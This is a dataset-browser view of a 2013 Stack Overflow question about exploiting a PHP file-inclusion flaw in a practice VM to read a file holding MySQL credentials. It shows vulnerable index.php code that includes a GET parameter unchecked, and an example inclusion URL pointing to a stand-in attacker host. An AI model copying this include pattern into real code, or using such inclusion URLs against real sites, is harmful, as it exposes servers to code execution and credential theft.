StackOverflow2013

Note that there are some explanatory texts on larger screens.

plurals

POPHP security exploit - list content of remote PHP file?
primarykey
Id
20726247
data
AcceptedAnswerId
20726497
AnswerCount
3
ClosedDate
CommentCount
4
CommunityOwnedDate
CreationDate
2013-12-22T04:24:18.320
FavoriteCount
12
LastActivityDate
2015-04-28T11:33:38.550
LastEditDate
2013-12-22T04:30:27.280
LastEditorUserId
1048729
OwnerUserId
1048729
ParentId
0
PostTypeId
1
Score
7
ViewCount
39889
LastEditorDisplayName
text
Body
I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a php file named <code>setupreset.php</code> which has the information about MySQL configs, setup and passwords used to setup the website. This is in the same directory as the rest of the php files (index, products, forum, etc...). This is the code of index.php, for reference: <pre><code><?php include ("includes/header.php"); // Grab inputs $page = $_GET[page]; if ($page=="") { include("home.html"); } else { include ($page . '.php'); } include ("includes/footer.php"); ?> </code></pre> The main goal is to list the contents of the <code>setupreset</code> PHP file, or download it somehow. If I navigate to this file: <code>http://10.211.55.5/index.php?page=setupreset</code>, it gets executed, but the PHP code is naturally not shown, due to the fact that it is parsed by the PHP interpreter. Now, the website uses PHP <code>include</code>s, so URLs look like this: <code>http://10.211.55.5/index.php?page=products</code>. This seems like it's vulnerable to remote file inclusion, where I could simply point to another PHP page, e.g. <code>http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.php</code> but <code>allow_url_include</code> is <code>off</code> and cannot be changed, so this won't work (I tried this). However, <code>allow_url_fopen</code> is likely on (since it's on by default), so my question is the following: is it possible to upload a PHP file or some script that lists the content of <code>setupreset.php</code> using this kind of exploit? 
Tags
<php><security><exploit><ssi>
Title
PHP security exploit - list content of remote PHP file?
singulars
PostAcceptedAnswerId
1. PO
 singulars
 PostTypePostTypeId
 PTAnswer
PostParentId
1. This table or related slice is empty.
PostTypePostTypeId
1. PTQuestion
UserLastEditorUserId
1. USswiftcode
UserOwnerUserId
1. USswiftcode
plurals
PostLinksPostIdRelatedPostId
1. This table or related slice is empty.
PostLinksRelatedPostIdPostId
1. This table or related slice is empty.
PostsAcceptedAnswerId
1. This table or related slice is empty.
PostsParentIdCreationDate
1. PO
 singulars
 PostTypePostTypeId
 PTAnswer
2. PO
 singulars
 PostTypePostTypeId
 PTAnswer
3. PO
 singulars
 PostTypePostTypeId
 PTAnswer
VotesPostIdCreationDate
1. VO
 singulars
 PostPostId
 POPHP security exploit - list content of remote PHP file?
 UserUserId
 This table or related slice is empty.
 VoteTypeVoteTypeId
 VTDownMod
2. VO
 singulars
 PostPostId
 POPHP security exploit - list content of remote PHP file?
 UserUserId
 This table or related slice is empty.
 VoteTypeVoteTypeId
 VTUpMod
3. VO
 singulars
 PostPostId
 POPHP security exploit - list content of remote PHP file?
 UserUserId
 UScyber-guard
 VoteTypeVoteTypeId
 VTFavorite
CommentsPostId

Querying!

Guidance

A row detail

Detail views are divided into sections. All the information in the data section comes from columns in the selected row. The other sections display data from other, related rows.

Related data can be related in a to-one or a to-many fashion. Captions of data related in a to-many fashion link to a list view showing a filtered view of the table.

Try moving around until you find a non-empty to-many entry and click on the label to get to one. You can move back to the root by clicking on the database name in the header.